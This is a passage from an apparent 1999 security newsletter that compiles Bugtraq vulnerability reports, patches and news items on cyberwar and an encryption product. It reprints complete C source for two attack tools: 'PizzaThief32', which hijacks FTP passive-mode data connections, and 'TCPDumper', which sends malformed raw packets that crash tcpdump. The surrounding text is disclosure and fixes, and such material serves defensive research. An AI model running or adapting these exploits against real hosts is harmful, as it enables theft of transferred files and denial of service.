disable the control remotely. Instead the company had to patch IE to permanently disable the control. Few other companies would have this luxury. While enabling or disabling ActiveX use for web site access is entirely a matter of preference, I would personally recommend that all users of Microsoft e-mail applications alter their e-mail client security settings so that neither ActiveX or scripting language is supported in incoming messages . This can be done by setting the e-mail security zone to 'restricted'. -Steve ----------------------------------------------------------------------------- The ActiveX Hard Disk Explorer

The ActiveX Hard Disk Explorer

This page uses the ability of the preloader control to report the presence or absence of a file or url to a controlling script. It loops through a number of "Well known" files to determine information about the user's system. This information could be fed back to a web server for marketing reasons, or used to test for the presence of other security weaknesses which could be exploited.

The example script is not very smart and does not use the results of initial tests to determine further directions of investigation. For example, even if the absence of the file c:\boot.ini reliably indicates there is no version of NT installed, the script still looks for the OS in common locations. The results of individual tests are stored, and could be used for better searching, or could be fed back to a server with ease.

Examining the source shows how this is could be accomplished. Oh, and if you mail this to someone who uses Outlook to read their mail, guess what happens when they get it? Recipients will have to be grateful this file search is not done after a page load, and that the results are not sent back to the server.

June 1999: Within a few weeks of notifying Microsoft the errant control has been removed from their site, although there is nothing to stop mischevious web site authors from serving the control locally, as is done here. A patch to IE actually disables the control for good.

ActiveX not found or enabled; no security risk demonstrable

Run the Test

[back] [home] [copyright ] [software] @HWA 117.0 denial of service attack against NT PDC from Win95 workstation ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Fri, 4 Jun 1999 14:01:01 -0700 Reply-To: Carl Byington Sender: Windows NT BugTraq Mailing List From: Carl Byington Subject: denial of service attack against NT PDC from Win95 workstation -----BEGIN PGP SIGNED MESSAGE----- I searched the archives, but did not find this one discussed. We have an NT PDC and a bunch of Win95 workstations. The NT domain name is AAA and the PDC netbios machine name is BBB. Normally, the Win95 workstations are configured to logon to the NT domain, and with the identification tab set to workgroup=AAA. This works nicely. However, we misconfigured a Win95 box with workgroup=BBB. No symptoms were evident until the server was rebooted after a power failure (properly handled by an APC UPS). We then got the 'BBB is not a valid computer name' which caused the workstation service to fail to start, and that in turn prevented a bunch of other stuff from starting. The event log entry pointed to the IP address of the PDC as being responsible for trying to add the conflicting name BBB. We could manually start the affected services, starting with the workstation service. At that point, things seemed to be more or less normal, but user manager for domains had problems opening the user list. These symptoms seemed to be similar to those listed in MS article Q166184, but we don't have RAS installed on that machine, and we don't have any static WINS entries. However, we did not scroll thru the full list of workstations in the WINS database, or we would have seen the Win95 workstation that had registered the name BBB. At this point, we deleted the entire WINS database and rebooted the server. Things worked normally until that workstation again registered its name as BBB, but this time the event log pointed to the workstation IP so we could finally track it down. The server is running NT4, SP3. -----BEGIN PGP SIGNATURE----- Version: 4.5 iQCVAgUBN1g+hdZjPoeWO7BhAQFtoAQAqEkBc/RfrRuIyddbQRZ+gJxHYnflk0NU pAv+vx9vbI/qAVzdPH2anLMyb4Sci042Tix9bsRCHIB3V6f8qqBgaOSpJjzZEn8z OmY+sxlgnuC6yO4c2VWXJTh4OGq6HS0wjhPdQKfKHvYe5BvePeJ6+S8gl5BuG5lO pV33Ftg1JRU= =Dt/i -----END PGP SIGNATURE----- PGP key available from the key servers. Key fingerprint 95 F4 D3 94 66 BA 92 4E 06 1E 95 F8 74 A8 2F A0 http://www.five-ten-sg.com @HWA 118.0 Microsoft win2k PASV vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Tue, 15 Jun 1999 10:39:34 -0700 From: Greg Hoglund To: BUGTRAQ@netspace.org Subject: Microsoft win2k PASV vulnerability Many people are aware of an old vulnerability with FTP servers. The problem is related to not authenticating the source address of PASV port connections. To add insult to injury, many FTP servers also open these ports in sequential order. Now, I would expect that many of the older installations out on the 'Net would be vulnerable. However, I would not expect the latest Beta release of Microsoft Windows 2000 server to have this vulnerability. Come on people! After discovering this problem on my W2k installation, I tested it against ftp.microsoft.com. No surprises.. their public ftp server is vulnerable also. Now, using FTP w/o SSH in the first place is a bad idea. However, I still think that this vulnerability is easy to fix and of all things it shouldn't present in win2k. My wu-ftp install doesn't have this problem. I dug around around on the net to see if anyone had written a script for this. I found "pizzathief" for solaris. I re-wrote the program for NT and added some features. The source code for "PizzaThief32" is posted below. <--- snip /* * PizzaThief32 Exploit written by Greg Hoglund * * Special thanks to Jeffrey R. Gerber for thinking of such a cool name * and to Bret McDanel for writing pizzathief for solaris! * * A common problem with FTP servers around the world results from * "passive mode". A client will issue the PASV command and the * server will in turn open a local port and wait for the client to * connect. Once the client connects, the server will transmit the * file or directory listing or whatever big chunk of data the client * wanted. The crux of the problem is that many FTP servers do not * check the source address of the connecting client. Hence, if the * men in black manage to connect to that port before you do, you lose * your file to someone else! And if this problem wasn't old as mold * already, Microsoft's Windows 2000 FTP server (version 5.0 I think) * has the problem. In fact, so does Microsoft's *public* FTP site! * And the icing on the cake is many FTP servers open PASV ports in * sequential order making the guesswork easy. * * This 'sploit runs under Windows NT and uses nonblocking i/o to snag * as much data as possible. The code is cleaned up a bit, and the * tool will now snag connections in a cycle. */ #include #include #include #define NUMSOCK 64 #define FLAG_VERBOSE (0x1 << 1) #define FLAG_STDOUT (0x1 << 2) int connserver(char *host,int port); int netgets(char *buff, int len, int sd); void dumpdata(int theSocket, struct in_addr ip, unsigned short port); int pizzaman32(struct in_addr ip, unsigned short port); unsigned long gFlags = 0; unsigned long gTimeout = 5000; main(int argc, char **argv) { int sd, count; struct in_addr ip; char buff[1024],*ptr1; unsigned short int port; WSADATA wsaData; if(0 != WSAStartup(MAKEWORD(2,0), &wsaData)) { WSACleanup(); fprintf(stderr, "Could not load winsock DLL\n"); exit(0); } if(argc < 2) { fprintf(stderr, "Pizzathief32 for NT!\nFrom the Law Offices of Hoglund, " \ "McDanel, & Gerber\nUsage: %s [-v -tTimeout -s] " \ "\n options: -v Verbose\n " \ "-t timeout in ms\n -s dump to stdout\n",argv[0]); exit(0); } count = 0; while(argv[++count][0] == '-'){ switch(argv[count][1]){ case 'v': gFlags |= FLAG_VERBOSE; break; case 't': if(isdigit(argv[count][2])) gTimeout = atoi(&argv[count][2]); break; case 's': gFlags |= FLAG_STDOUT; break; default: break; } } if( (count < argc) && ((sd=connserver(argv[count],21)) < 0) ) { fprintf(stderr, "could not connect to server"); exit(0); } while(1) { if(netgets(buff,sizeof(buff),sd)==0) { fprintf(stderr, "server closed control connection\n"); closesocket(sd); exit(0); } if(!strncmp(buff,"220 ",4)) { if(FLAG_VERBOSE & gFlags) fprintf(stdout, "requesting username\n"); sprintf(buff,"user ftp\n"); send(sd,buff,strlen(buff),0); } if(!strncmp(buff,"331 ",4)) { if(FLAG_VERBOSE & gFlags) fprintf(stdout, "requesting password\n"); sprintf(buff,"pass pizzaman@illuminati.gov\n"); send(sd,buff,strlen(buff),0); } if(!strncmp(buff,"230 ",4)) { if(FLAG_VERBOSE & gFlags) fprintf(stdout, "we are logged in now\n"); sprintf(buff,"pasv\n"); send(sd,buff,strlen(buff),0); } if(!strncmp(buff,"530 ",4)) { /* invalid password */ sprintf(buff,"quit\n"); send(sd,buff,strlen(buff),0); closesocket(sd); fprintf(stderr, "User ftp wasnt allowed\n"); exit(0); } if(!strncmp(buff,"227 ",4)) { char seps[] = "()"; char *token; /* PASV response */ if(FLAG_VERBOSE & gFlags) fprintf(stdout, buff); /* first get the ip/port into the buffer */ token = strtok(buff,seps); token = strtok((char *)NULL,")"); /* now break off the IP part */ ptr1=(char *)&ip; ptr1[0]=atoi(strtok(token,",")); ptr1[1]=atoi(strtok((char *)NULL,",")); ptr1[2]=atoi(strtok((char *)NULL,",")); ptr1[3]=atoi(strtok((char *)NULL,",")); /* now get the port number */ ptr1=(char *)&port; ptr1[0]=atoi(strtok((char *)NULL,",")); ptr1[1]=atoi(strtok((char *)NULL,",")); sprintf(buff,"pasv\n"); // recirculate pasv connection send(sd,buff,strlen(buff),0); pizzaman32(ip,port); } } return(0); } int connserver(char *host,int port) { int sd,addr; struct hostent *he; struct sockaddr_in sa; /* try to resolve the host */ if((addr=inet_addr(host))!= -1) { /* dotted decimal */ memcpy(&sa.sin_addr,(char *)&addr,sizeof(addr)); } else { if((he=gethostbyname(host))==NULL) { fprintf(stderr, "Unable to resolve %s\n", host); return(-1); } memcpy(&sa.sin_addr,he->h_addr,he->h_length); } sa.sin_port=htons(port); sa.sin_family=AF_INET; if((sd=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) { perror("socket"); return(-1); } if(connect(sd,(struct sockaddr *)&sa,sizeof(sa))<0) { perror("connect"); return(-1); } return(sd); } int netgets(char *buff, int len, int sd) { int i; memset(buff,0,len); for(i=0;i 0) { if(char_recv > 0) { if(aFlag) { aFlag = 0; ioctlsocket(theSocket, FIONBIO, &aFlag); //block on this transfer } if(FLAG_VERBOSE & gFlags) fprintf(stdout, "*** Got data for %s\n", aFilename); if(FLAG_STDOUT & gFlags) { buff[char_recv] = NULL; fprintf(stdout, "%s", buff); } else { if(NULL == out_file) { out_file = fopen(aFilename, "wb"); } if(out_file) { fwrite(buff, char_recv, 1, out_file); } } } } if((FLAG_VERBOSE & gFlags) && (0 == char_recv)) fprintf(stdout, "server closed connection\n"); if(out_file) fclose(out_file); } @HWA 119.0 useradd -p stores cleartext passwords / shadow-980724 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Fri, 11 Jun 1999 10:11:29 EET From: Emils Klotins To: BUGTRAQ@netspace.org Subject: useradd -p stores cleartext passwords / shadow-980724 Hello. Sorry if this is reported already. Didn't find it in Bugtraq archives nor in SuSE support db. OS: SuSE Linux 6.1 Program: useradd Package: shadow-980724 Problem description: 'useradd' command has an option '-p password' for specifying password to the newly added user. (This option btw, does not appear anywhere in useradd man page) If you specify this option along with a password, the password will be stored in /etc/shadow, but in cleartext, creating 2 problems:? 1. The password is stored in cleartext 2. It of course does not work, for upon login an encrypted version of password is expected to be in /etc/shadow. PS. I could agree that specifying password in command-line can be considered quite dangerous, however, if the option is there, it should either work correctly or not be there. Emils Klotins e-mail: emils@mail.usis.bkc.lv Systems Manager URL: http://www.usis.bkc.lv/ USIS Riga 7 Smilsu Str., Riga LV1050, LATVIA ------------------------------------------------------------------------------- Date: Fri, 11 Jun 1999 16:02:50 -0400 From: "Roche-Kelly, Edmund B." To: BUGTRAQ@netspace.org Subject: Re: useradd -p stores cleartext passwords / shadow-980724 I would think the obvious answer is that the password supplied as an argument to -p is the encrypted password, generated by any of the mkpasswd utilities. I agree it's odd that it's not mentioned in the man page. Ed ------------------------------------------------------------------------------- Date: Fri, 11 Jun 1999 19:32:03 -0500 From: James Sneeringer To: BUGTRAQ@netspace.org Subject: Re: useradd -p stores cleartext passwords / shadow-980724 On Fri, 11 Jun 1999, Roche-Kelly, Edmund B. wrote: | | I agree it's odd that it's not mentioned in the man page. It was added to the man page in version 19990307. SuSE needs to update their package. The current version is 19990607, available at ftp://piast.t19.ds.pwr.wroc.pl/pub/linux/shadow/ -James @HWA 120.0 UID 65536 and shadow-19990307 root compromise ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Mon, 24 May 1999 20:44:28 +0200 From: Lord Evil To: BUGTRAQ@netspace.org Subject: UID 65536 and shadow-19990307 Recently one of our admins installed the shadow-19990307 package. While playing around I noticed that if a new user is created with UID 65536, he will become root upon login. No root login will be logged, and even if the tty isn't in /etc/securetty he will be allowed in. I dont think this is normal behaviour :) @HWA 121.0 big brother in your cc(!) ~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Tue, 15 Jun 1999 00:17:12 +1000 From: Darren Reed To: BUGTRAQ@netspace.org Subject: big brother in your cc Whilst this isn't strictly speaking a security bug, it borders on Sun acting in a very "big brother" manner which is frightening! For those of you using Sun's SUNWspro C compiler package, beware! The binaries "c89" and "cc" appear to automagically send an email to "ut-cc@sunpro.Eng.Sun.COM" with a list of C compiler commands, including some sort of cpu-time summary. Extract as follows: INFO unix i86pc SunOS 5.7 cc -E CPU-time 0.010000 0.010000 ... cc -o -Xa -O CPU-time 0.000000 0.060000 ... cc -o -Xa -O CPU-time 0.020000 0.050000 and so on. Setting the environment variable UT_NO_USAGE_TRACKING seems to do the right thing but for those that wish to enable this feature, check with strings on the available environment settings to mediate this (search for UT_). The mail is set to originate from "nobody" so it's unlikely you'll notice it if it fails to be delivered unless you check your mail queue. --------------------------------------------------------------------------- Date: Mon, 14 Jun 1999 23:33:09 +0200 From: Casper Dik To: BUGTRAQ@netspace.org Subject: Re: big brother in your cc >Whilst this isn't strictly speaking a security bug, it borders on >Sun acting in a very "big brother" manner which is frightening! > >For those of you using Sun's SUNWspro C compiler package, beware! >The binaries "c89" and "cc" appear to automagically send an email >to "ut-cc@sunpro.Eng.Sun.COM" with a list of C compiler commands, >including some sort of cpu-time summary. Extract as follows: > >cc -E (I have a strong sense of deja-vu, wasn't this discussed before on BUGTRAQ? Ah wait, Usenet Oct '98) This compiler "feature" only exists in the pre-FCS compilers (i.e., Alpha and Beta products) and other pre-FCS workshop products. It was documented in several locations, perhaps even in the "must read and agree to" license, but I think it was pretty prominent. (The websites have gone now that FCS is here) (Some older compilers inadvertedly left the code in) 4.0? 4.1? That is, unless you have a domainname set on your system that ends in .sun.com; in that case usage tracking also happens with your FCS compiler. So it's not all that big brotherish as you make it out: - for alpha/beta only - documented how to switch off (in several places) - the cc command lines forwarded only include the options, not the option parameters or file name arguments. (-DFOO becomes -D, -Lpath gives -L etc ; file.c is not listed) Nothing sinister, just alpha/beta users helping to gather statistics about compiler option usage. (And us internal Sun folk who get to test drive all stuff) Of course, we could argue whether this should be an opt-in or opt-out thing till we're blue in the face, but let's not. Suffices to say that I've long since disabled most outgoing mail >from my system. Casper --------------------------------------------------------------------------- Date: Mon, 14 Jun 1999 20:00:05 +0100 From: Alec Muffett To: BUGTRAQ@netspace.org Subject: Old Software (Was: Re: big brother in your cc) [Aleph - please expedite posting this if possible. Love'n'Hugs.] >Whilst this isn't strictly speaking a security bug, it borders on >Sun acting in a very "big brother" manner which is frightening! Hi Guys, The story I am told, is: | This is VERY OLD NEWS. This info was collected as part of the | Workshop 5.0 Early Access and Developer Release programs. It is | *not*, I repeat, NOT turned on in the FCS release of the product. | When customers downloaded the Early Access and Developer Release | products off the web they where told this info was being collected via | the FAQ and via the web security disclosure statment on the web | site. In addition, the FAQ told them how to turn it off if they felt | that it was data they did no want to devulge. | | The Early Access and Developer Release web sites are long since | defunct since the WS 5.0 product FCS in 2/2/99. It used to be located | at http://access1.sun.com/workshop5.0ea. ...so, can anyone submit an instance of this happening with the non early-access software? - alec --------------------------------------------------------------------------- Date: Tue, 15 Jun 1999 17:16:52 +1000 From: Darren Reed To: BUGTRAQ@netspace.org Subject: Re: big brother in your cc I must admit that I'm quite embaressed about bringing this up without properly checking which versions, etc, had the described behaviour as it doesn't appear in any of the FCS versions. In some mail from Casper Dik, sie said: > > (I have a strong sense of deja-vu, wasn't this discussed before on > BUGTRAQ? Ah wait, Usenet Oct '98) > > This compiler "feature" only exists in the pre-FCS compilers (i.e., > Alpha and Beta products) and other pre-FCS workshop products. Yes, I should have checked more fully on systems I have at my disposal. > It was documented in several locations, perhaps even in the > "must read and agree to" license, but I think it was pretty prominent. And like most licenses which people need to get through to install/get software, I (like most people) tend to just click "yes" rather than `waste' time reading it. Still, I'd have rather seen the email come from foo@ rather than nobody@ (which has the effect of making it disappear via /dev/null if an error occurs in delivery). Darren @HWA 122.0 TCP MD5 option problem (router DoS) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Mon, 14 Jun 1999 14:29:54 -0400 From: Craig Metz To: BUGTRAQ@netspace.org Subject: TCP MD5 option problem I was implementing the RFC 2385 ("Protection of BGP Sessions via the TCP MD5 Signature Option") option in the OpenBSD stack. For those who don't know the significance of this option, it is used to provide some level of active attack (primarily hijacking) protection for BGP sessions on Internet core routers. One thing I noticed about the spec is that TCP options are completely excluded from the MAC function. The IOS TCP implementation doesn't appear to do anything significant with TCP options and does not send any, and so, therefore, this doesn't seem to be a problem on those systems. However, there are several other players in the core router space (e.g., Juniper and Torrent/Ericsson) who use 4.4BSD-derived operating systems, and those have networking stacks which DO use TCP options. In particular, 4.4BSD processes the TCP MSS, timestamp, and window size options, and includes enough padding that one might also be able to shuffle things around and slip something else in. A possible active attack might be to sniff a TCP packet in transit and to spoof a version of that same packet with the TCP options changed, in hopes that the genuine packet will be dropped in transit but the spoofed one will get through. A quick read of the BSD source indicates that a MSS option's size of zero will be internalized, which might be one possible attack to try. Such an attack might be able to adjust TCP parameters to "choke" the TCP connection; it will be alive and connected, but little to no routing data would move. That in turn could be used either as a denial of service attack or to partition groups of routers to make other attacks harder to detect. I haven't cooked up a real exploit for this because I don't have any of the routers that would be affected handy in my lab, but I suppose that someone so inclined could do so given this discussion and some time to experiment. The (IMO) obvious fix for this problem is to use IPsec's Authentication Header (AH) and to deprecate the TCP MD5 option. There are several freely available and viable AH implementations for BSD (including the NRL, OpenBSD, and KAME ones) and I believe that modern IOS has AH code in it though it's not currently set up for protecting routing traffic. AH covers all of the TCP header and options, as well as typically having a better MAC function (the RFC 2385 option builds a MAC by appending the key, which is possibly the weakest way to do it). -Craig ----------------------------------------------------------------------------------- Date: Wed, 16 Jun 1999 22:33:36 -0400 From: Steven M. Bellovin To: BUGTRAQ@netspace.org Subject: Re: TCP MD5 option problem In message <199906141822.SAA05311@inner.net>, Craig Metz writes: > > The (IMO) obvious fix for this problem is to use IPsec's Authentication > Header (AH) and to deprecate the TCP MD5 option. There are several freely > available and viable AH implementations for BSD (including the NRL, OpenBSD, > and KAME ones) and I believe that modern IOS has AH code in it though it's not > currently set up for protecting routing traffic. AH covers all of the TCP > header and options, as well as typically having a better MAC function (the RFC > 2385 option builds a MAC by appending the key, which is possibly the weakest > way to do it). The RFC 2385 scheme describes a hack that was developed precisely because IPSEC wasn't ready, and *something* was needed to protect BGP traffic. You're absolutely right -- no one should use it for any new work. @HWA 123.0 tcpdump 3.4 bug? (DoS) ~~~~~~~~~~~~~~~~~~~~~~~ Date: Wed, 1 Jan 1986 16:30:10 +0100 From: badi To: BUGTRAQ@netspace.org Subject: tcpdump 3.4 bug? /* tcpdump bug 3.4a? by BLADI (bladi@euskalnet.net); On receiving an ip packet with Protocol-4 and ihl=0, tcpdump enters an infinite loop within the procedure ip_print() from file print_ip.c This happens because the header length (ihl) equals '0' and tcpdump tries to print the packet I've tried the bug in diferent OS's Linux: SuSE 6.x: K2.0.36 tcpdump consumes all the system memory K2.2.5 in less than a minute and hangs the system K2.2.9 or sometimes gives an error from the bus K2.3.2 K2.3.5 RedHat 5.2: K2.?.? tcpdump makes a segmentation fault to happen 6.0: K2.2.9 and it sometimes does a coredump Debian K2.2.? tcpdump makes a segmentation fault to happen and does a coredump Freebsd Segmentation fault & Coredump Thanks to: wb^3,Cagliostr Solaris Segmentation fault & Coredump Thanks to: acpizer Aix ? Hp-UX ? ------------------------------------------------------------- This tests have been carried out in loopback mode, given that protocol 4 won't get through the routers. It would be interesting to perform the attack remotely in an intranet. But i do not have access to one. ------------------------------------------------------------------------------ Thanks to: the channels: #ayuda_irc,#dune,#linux,#networking,#nova y #seguridad_informática. >from irc.irc-hispano.org Special thanks go to: Topo[lb],^Goku^,Yogurcito,Pixie,Void,S|r_|ce,JiJ79,Unscared etc... Thanks to Piotr Wilkin for the rip base code ;) And big thanks go to TeMpEsT for this translation. ------ I've found two ways of solving the problem Solution 1 execute: tcpdump -s 24 Solution 2 Apply this little patch. diff -r -p /tcpdump-3.4a6/tcpdump-3.4a6/print-ip.c /tcpdump-3.4a7/tcpdump-3.4a6/print-ip.c *** /tcpdump-3.4a6/tcpdump-3.4a6/print-ip.c Wed May 28 21:51:45 1997 --- /tcpdump-3.4a7/tcpdump-3.4a6/print-ip.c Tue Oct 27 05:35:27 1998 *************** ip_print(register const u_char *bp, regi *** 440,446 **** (void)printf("%s > %s: ", ipaddr_string(&ip->ip_src), ipaddr_string(&ip->ip_dst)); - ip_print(cp, len); if (! vflag) { printf(" (ipip)"); return; --- 440,445 ---- */ #include #include #include #include #include #include #include #include #include #include struct icmp_hdr { struct iphdr iph; char text[15]; } encaps; int in_cksum(int *ptr, int nbytes) { long sum; u_short oddbyte, answer; sum = 0; while (nbytes > 1) { sum += *ptr++; nbytes -= 2; } if (nbytes == 1) { oddbyte = 0; *((u_char *)&oddbyte) = *(u_char *)ptr; sum += oddbyte; } sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); answer = ~sum; return(answer); } struct sockaddr_in sock_open(int socket, char *address,int prt) { struct hostent *host; struct sockaddr_in sin; if ((host = gethostbyname(address)) == NULL) { perror("Unable to get host name"); exit(-1); } bzero((char *)&sin, sizeof(sin)); sin.sin_family = PF_INET; sin.sin_port = htons(prt); bcopy(host->h_addr, (char *)&sin.sin_addr, host->h_length); return(sin); } void main(int argc, char **argv) { int sock, i,k; int on = 1; struct sockaddr_in addrs; printf("\t\tTCPDumper Ver 0.2 \n\t\t\tBy Bladi\n"); if (argc < 3) { printf("Uso: %s \n", argv[0]); exit(-1); } encaps.text[0]=66; encaps.text[1]=76; encaps.text[2]=65; encaps.text[3]=68; encaps.text[4]=73; encaps.text[5]=32; encaps.text[6]=84; encaps.text[7]=90; encaps.text[8]=32; encaps.text[9]=84; encaps.text[10]=79;encaps.text[11]=32; encaps.text[12]=84;encaps.text[13]=79;encaps.text[14]=80;encaps.text[15]=79; sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == -1) { perror("Can't set IP_HDRINCL option on socket"); } if (sock < 0) { exit(-1); } fflush(stdout); addrs = sock_open(sock, argv[2], random() % 255); encaps.iph.version = 0; encaps.iph.ihl = 0; encaps.iph.frag_off = htons(0); encaps.iph.id = htons(0x001); encaps.iph.protocol = 4; encaps.iph.ttl = 146; encaps.iph.tot_len = 6574; encaps.iph.daddr = addrs.sin_addr.s_addr; encaps.iph.saddr = inet_addr(argv[1]); printf ("\t DuMpInG %s ---> %s \n",argv[1],argv[2]); if (sendto(sock, &encaps, 1204, 0, (struct sockaddr *)&addrs, sizeof(struct sockaddr)) == -1) { if (errno != ENOBUFS) printf("Error :(\n"); } fflush(stdout); close(sock); } -------------------------------------------------------------------------------- Date: Thu, 17 Jun 1999 12:19:06 +0100 From: acpizer To: BUGTRAQ@netspace.org Subject: Re: tcpdump 3.4 bug? The given source for killing tcpdump will only work on local networks since routers drop the bad packet it creates, a more constuctive patch for tcpdump is listed below. -- snip -- diff -r -p print-ip.orig.c print-ip.c *** print-ip.orig.c Thu Jun 17 11:24:17 1999 --- print-ip.c Thu Jun 17 14:07:50 1999 *************** ip_print(register const u_char *bp, regi *** 374,379 **** --- 374,384 ---- (void)printf("truncated-ip %d", length); return; } + + if (ip->ip_hl == 0) { + (void)printf("bad ip packet - header length = 0\n"); + return; + } hlen = ip->ip_hl * 4; len = ntohs(ip->ip_len); -- snip -- Cheers. ------------------------------------------------------------------------------- "Probably you've only really grown up, when you can bear not being understood." Marian Gold /Alphaville -------------------------------------------------------------------------------- Date: Fri, 18 Jun 1999 13:16:33 +0300 From: Markus Peuhkuri To: BUGTRAQ@netspace.org Subject: Re: tcpdump 3.4 bug? acpizer writes: > since routers drop the bad packet it creates, a more constuctive patch for ... > + if (ip->ip_hl == 0) { Actualy, as the minimum length is 5*4 bytes that could be as well "if (ip->ip_hl < 5) {". If it is shorter it is bad anyway. -- Markus Peuhkuri ! Markus.Peuhkuri@hut.fi ! http://www.iki.fi/puhuri/ -------------------------------------------------------------------------------- Date: Sun, 20 Jun 1999 09:17:32 +0100 From: acpizer To: BUGTRAQ@netspace.org Subject: Re: tcpdump 3.4 bug? (final) Hi again, Thanks goes to Markus Peuhkuri for pointing out that the minimum length of an IP packet is actually 20 bytes, (I'm useless w/o a copy of TCP/IP Illustrated in front of me), anyway, here is a final patch, also don't forget to run tcpdump with the -v parameter if you want to see the source address of the offensive packet. Are the guys at LBL reading bugtraq? (tcpdump on ftp.ee.lbl.gov isn't updated yet...) maybe they don't think it's a bug since routers drop the packet anyway, how aobut attacking machines which run tcpdump locally on the LAN? *** print-ip.orig.c Thu Jun 17 11:24:17 1999 --- print-ip.c Sun Jun 20 11:04:20 1999 *************** ip_print(register const u_char *bp, regi *** 440,445 **** --- 440,451 ---- (void)printf("%s > %s: ", ipaddr_string(&ip->ip_src), ipaddr_string(&ip->ip_dst)); + + if (ip->ip_hl < 5) { + (void)printf("Bad ip-in-ip encapsulation (hl < 5) Possible attack!"); + return; + } + ip_print(cp, len); if (! vflag) { printf(" (ipip)"); Cheers. ------------------------------------------------------------------------------- "Probably you've only really grown up, when you can bear not being understood." Marian Gold /Alphaville @HWA 124.0 [ISN] A mouse that roars? ~~~~~~~~~~~~~~~~~~~~~~~~~ Forwarded From: William Knowles http://www.washingtonpost.com/wp-srv/national/dotmil/arkin.htm A Mouse That Roars? By William M. Arkin Special to washingtonpost.com Monday, June 7, 1999 Last week, Newsweek reported that President Clinton approved a covert operation in May to find an electronic silver bullet to do what the White House at the time believed the air war couldn't. According to the report, the CIA would conduct a cyberwar against Milosevic, specifically going after his financial assets in banks throughout Europe. Is the keyboard mightier than the sword? Before Allied Force, the intelligence agencies held a cyberwar exercise to answer this very question. At center stage was the Information Operations Technology Center (IOTC), activated last year and made up of the best cyberwarriors of the U.S. government. Housed at National Security Agency headquarters at Fort Meade, Md., IOTC brings together highly secret capabilities: NSA's P42 information warfare cell, the CIA's Critical Defense Technologies Division, the Pentagon's "special technology operations." Military sources familiar with the March demonstration say there is no question that the keyboard covert operators wowed the Joint Staff with their computer attack capabilities. But they are adamant in insisting that cyberbombs are more laboratory technologies than usable weapons. In fact, the sources point out, the only cyberwar raging is inside the U.S. government where Washington lawyers and policymakers, military leaders, and official hackers battle over the value and legality of network attack. Where's The Bits? --------------------------------------------------------------------------- The day bombs started falling on Yugoslavia, the Air Force Association convened a high-level symposium in San Antonio, Tex., to address the status of information warfare. Washingtonpost.com has obtained a transcript of the two-day proceeding. Gen. John Jumper, commander of U.S. Air Forces in Europe, joined the closed-door session via satellite from his headquarters in Germany. "I have not had much sleep over the last 48 hours, and I am probably not as sharp or prepared as I would like to be," he apologized. Tired or not, the senior air force officer in Europe wasted no time blasting the bias of information warriors to fight battles solely at the "strategic level." He was referring to the very sort of effort Newsweek would speculate about two months later. "When we hear talk of information warfare," Jumper said, "the mind conjures up notions of taking some country's piece of sacred infrastructure in a way that is hardly relevant to the commander at the operational and tactical level." "I would submit that we are not there with information warfare," he concluded. Networking Network Attack ---------------------------------------------------------------------------- Brig. Gen. John B. Baker, commander of the Air Intelligence Agency and head of the Pentagon's Joint Command and Control Warfare Center, followed Jumper. "In my hat as the air force component commander for NSA," he warned, "I spend a lot of time working ... on how to exploit what is going on out there in computer networks." But when it comes to going beyond collecting computer transmissions as raw intelligence to actually manipulating and exploiting the "zeroes and ones" for military value, Baker said, "we have a ways to go." --------------------------------------------------------------------------- Despite all the new information warfare organizations that have been established of late, he lamented that cyberwarriors did not yet have the stature of other warriors: "Effects-based warfare," that is, methods geared to achieve an outcome and not cause traditional damage lacks the "visually pleasing destruction from an armed bomb." Baker stressed that part of the problem in any kind of computer network attack is the concerns on the part of policy-makers in Washington with regard to legality and "traceability." Jumper described his experience: "I picture myself around that same targeting table where you have the fighter pilot, the bomber pilot, the special operations people and the information warriors. As you go down the target list, each one takes a turn raising his or her hand saying, I can take that target.' When you get to the info warrior, the info warrior says, "I can take the target, but first I have to go back to Washington and get a finding." Seeking permission invariably results in artificial restrictions and hesitations in attacking targets, Jumper stressed. From a field perspective, he said, the process of seeking the "special" operation cedes too much decision-making to inside the Beltway. Finding The Way The unusually candid discussions of the institutional and military stumbling blocks to an information warfare future contrasts with the Hollywood vision of cyberwar so common in the mainstream media these days. Still, Maj. Gen. Bruce A. "Orville" Wright told the symposium that "Within the area of computer network exploitation, there is tremendous investment, which, with a little bit of fine tuning, can be turned into a computer network attack capability." The IOTC, Wright said, "is a great organization that has a bright future." He should know. As Deputy Director for Information Operations for the Joint Chiefs of Staff, he is the military head of the interagency center and the top cyber-warrior in the U.S. military. But the key word is future. With the shooting war against Yugoslavia over, it should be crystal clear to anyone that exotic American cyberbombs have not aided the effort in any way. -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: OSAll [www.aviary-mag.com] @HWA 125.0 [ISN] Product Review: NOVaSTOR DataSAFE ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From: "L. Sassaman" -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Product Review: NOVaSTOR DataSAFE L. Sassaman 6/1/1999 The NOVaSTOR web site (http://data-encryption.com/index.html) makes this bold claim regarding their DataSAFE product: "Password Protect, Compress and Encrypt your Files and Email Protect your data from prying eyes! The DataSAFE family of encryption software stores, transmits and receives electronic files securely. Protect your sensitive files and data from prying eyes, whether on your PC or over the Internet and World Wide Web. DataSAFE encrypts your data with BLOWFISH or RSA secure algorithms which have never been broken, and can encrypt and protect every type of file on every kind of media." The benefits of using this software package are clear, according to the company. "DataSAFE is the only encryption software on the market that lets you send secure documents to people who do not have the program." Apparently, for a mere $39.50, one can have a quick, easy way of sending secure files to anyone with a computer. When using this product, the sender uses the program to generate a .exe file, encrypted with Blowfish, that he then sends as an attachment through email. The recipient does not need to have any additional software on his computer, as the encrypted message runs by itself (popping up a cute safe, which spits out the plain-text when the correct combination is entered.) Now, obviously, this lacks all the benefits of public key cryptography. (The key, or "combination to the safe" must be delivered to the recipient in some manner deemed secure. We are now back to the days of relying on couriers with hand-cuffed brief-cases for security. The web page 